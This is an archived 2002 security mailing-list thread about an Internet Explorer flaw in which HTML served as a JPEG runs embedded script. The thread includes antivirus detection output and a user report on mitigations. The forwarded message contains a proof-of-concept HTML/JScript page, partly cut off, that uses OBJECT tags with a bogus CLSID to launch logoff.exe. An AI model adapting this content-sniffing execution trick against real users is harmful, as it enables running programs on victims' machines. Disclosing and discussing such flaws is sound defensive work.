Vulnerability Development mailing list archives
Fw: [Re: Rather large MSIE-hole] another variant
From: "madness" <madness () diffusion net>
Date: Fri, 15 Mar 2002 19:50:05 -0800
FYI - Norton AV now picks this up. Scan type: Realtime Protection Scan Event: Virus Found! Virus name: XMLid.Exploit File: C:\XXXXX\Local Settings\Temporary Internet Files\Content.IE5\C9IVKTMJ\simplebind[1].htm Location: Quarantine Computer: XXXXXX User: XXXXXX Action taken: Clean failed : Quarantine succeeded : Access denied Date found: Fri Mar 15 19:46:32 2002 madness. ----- Original Message ----- From: "NoCoNFLiC" <nocon () castleblack darkflame net> To: "Magnus Bodin" <magnus () bodin org> Cc: <vuln-dev () securityfocus com> Sent: Friday, March 15, 2002 3:49 PM Subject: FW: [Re: Rather large MSIE-hole] another variant
[magnus () bodin org] Tue, Mar 12, 2002 at 11:32:20AM +0100 wrote:The latest MSIE-hole is now spreading. THE ATTACHED HTML-code is served as a jpeg-file, and as MSIE ignores the Content-Type if it "thinks" it knows better, then the code is executed. This in combination with the malicious code that is possible to run,
then
an "innocent.jpg" with the following content will log off an XP-user. --%< cut here----- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <TITLE>IE6 security...</TITLE> <META http-equiv=Content-Type content="text/html; charset=windows-1252"> <SCRIPT language=JScript> var programName=new Array( 'c:/windows/system32/logoff.exe', 'c:/winxp/system32/logoff.exe', 'c:/winnt/system32/logoff.exe' ); function Init(){ var oPopup=window.createPopup(); var oPopBody=oPopup.document.body; var n,html=''; for(n=0;n<programName.length;n++) html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' C oPopBody.innerHTML=html; oPopup.show(290, 390, 200, 200, document.body); } </SCRIPT> </head> <BODY onload="Init()"> You should feel lucky if you dont have XP right now. </BODY> </HTML> --%< cut here----- -- magnus MICROS~1 BOB was written in Lisp. http://x42.com/Just passing this along, as some may not be on the sec-basics list. -----Original Message----- From: Sprissler, Noah [mailto:NSPRISSLER () PARTNERS ORG] Sent: March 12, 2002 10:31 To: security-basics () security-focus com Subject: RE: scary site That's interesting. I have disabled active scripting as most have
suggested
and the http://www.liquidwd.freeserve.co.uk/ link stops bringing up a DOS prompt. However, if I goto this link from Greymagic http://security.greymagic.com/adv/gm001-ie/simplebind.html their implementation of this works fine no matter what settings I disable.
Win2k
with all patches, IE6 with all patches. -Noah -----Original Message----- -- - nocon ====================================== nocon () darkflame net http://nocon.darkflame.net ======================================
Current thread:
- Fw: [Re: Rather large MSIE-hole] another variant madness (Mar 15)
- Re: [Re: Rather large MSIE-hole] another variant Felipe Franciosi (Mar 16)
- Re: Fw: [Re: Rather large MSIE-hole] another variant Jann Fischer (Mar 16)